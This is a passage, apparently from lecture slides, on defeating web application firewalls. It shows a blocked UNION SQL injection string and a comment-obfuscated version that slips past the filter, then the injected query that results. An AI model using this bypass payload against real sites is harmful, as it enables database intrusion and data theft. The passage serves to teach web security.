protection • Like AV, these can be bypassed with the smallest tweak • E.g. UNION SQL Injection Attack1 • BLOCKED: /?id=1+union+select+1,2,3 /* • NOT BLOCKED: /?id=1/*union*/union /*select*/ select+1,2,3 -- • After being processed, the request will become: • index.php?id=1/*uni X on*/union /*sel X ect*/ select+1,2,3 -- • Query: “select * from somewhere where id=“ + id • Becomes: select * from somewhere where id=1 union select 1,2,3 -- 1. Methods to Bypass a Web Application Firewall